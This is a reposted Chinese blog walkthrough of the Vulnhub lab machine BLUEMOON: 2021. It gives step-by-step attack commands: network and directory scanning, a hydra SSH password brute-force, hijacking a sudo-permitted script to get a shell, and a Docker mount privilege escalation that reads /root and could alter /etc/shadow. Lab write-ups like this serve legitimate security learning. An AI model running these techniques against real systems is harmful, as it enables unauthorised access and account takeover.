BLUEMOON: 2021

最新推荐文章于 2022-03-29 10:55:51 发布

183****1694

最新推荐文章于 2022-03-29 10:55:51 发布

阅读量541

点赞数 1

原文链接：https://www.wangguixiu.top/vulnhub%E9%9D%B6%E5%9C%BA/BLUEMOON-2021.html

版权

BLUEMOON: 2021

作者: admin
时间: 2021-06-10
分类: vulnhub靶场

fping -g 192.168.137.1/24 # step1 扫主机，找到靶场131
nmap -A -p 1-65535 -v 192.168.137.131 # step2 扫端口，扫到21，22，80
dirb http://192.168.137.131 dict.txt # step3 扫目录，扫到"hidden_text"(论字典的重要性，我也没扫到，网上找的答案)

得到一个qr码，解开之后拿到ftp用户密码

#!/bin/bash HOST=ip USER=userftp PASSWORD=ftpp@ssword ftp -inv $HOST user $USER $PASSWORD bye EOF

登陆之后有两个文件，information文件说"hello robin，早跟你说过你密码不行了，我给你一个密码单子，你选一个改了吧"，另一个当然就是密码字典了(补一句，ftp可以去根目录，虽然没用上)

hydra -l robin -P p_list.txt ssh://192.168.137.131 # 成功爆出密码：k4rv3ndh4nh4ck3r

ssh连接之后...

robin@BlueMoon:~$ sudo -l
Matching Defaults entries for robin on bluemoon:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User robin may run the following commands on bluemoon:
(jerry) NOPASSWD: /home/robin/project/feedback.sh # 重点在这一行

最后一个说明feedback.sh文件是以jerry的身份运行的，ls -l feedback.sh 属主是robin，看下内容就一普通脚本，直接

robin@BlueMoon:~/project$ chmod +w feedback.sh

robin@BlueMoon:~/project$ echo “#/bin/bash

> /bin/bash” > feedback.sh

robin@BlueMoon:~/project$ sudo -u jerry ./feedback.sh # -u指定用户，默认root

jerry@BlueMoon:/home/robin/project$

用id看到jerry用户在docker中，直接用docker提权，因为docker程序有root的权限

-v /root:/mnt 把主机的/root挂载到虚拟机的/mnt，-it作用是直接进入虚拟机，alpine是系统

docker run -v /root:/mnt -it alpine

cat /mnt/root.txt 拿到flag

也可以把/etc目录挂进去，通过passwd和shadow文件改root密码或者添加用户

标签: vulnhub, 渗透, getshell, 提权

183****1694

关注

1
点赞
踩
1

收藏

觉得还不错? 一键收藏
0
评论
BLUEMOON: 2021

BLUEMOON: 2021 作者: admin 时间: 2021-06-10 分类: vulnhub靶场 fping -g 192.168.137.1/24 # step1 扫主机，找到靶场131nmap -A -p 1-65535 -v 192.168.137.131 # step2 扫端口，扫到21，22，80dirb http:/...
复制链接

扫一扫